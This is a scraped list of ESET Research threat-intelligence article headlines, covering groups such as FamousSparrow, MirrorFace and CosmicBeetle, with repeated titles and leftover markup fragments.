ppESET ResearchppYou will always remember this as the day you finally caught FamousSparrowppESET ResearchppYou will always remember this as the day you finally caught FamousSparrowppppESET ResearchppOperation FishMedleyppESET ResearchppOperation FishMedleyppppESET ResearchppOperation AkaiRyū MirrorFace invites Europe to Expo 2025 and revives ANEL backdoorppESET ResearchppOperation AkaiRyū MirrorFace invites Europe to Expo 2025 and revives ANEL backdoorppppESET researchppTelekopye transitions to targeting tourists via hotel booking scamppESET researchppEmbargo ransomware RocknRustppESET researchppCosmicBeetle steps up Probation period at RansomHubpp
Awardwinning news views and insight from the ESET security community
p
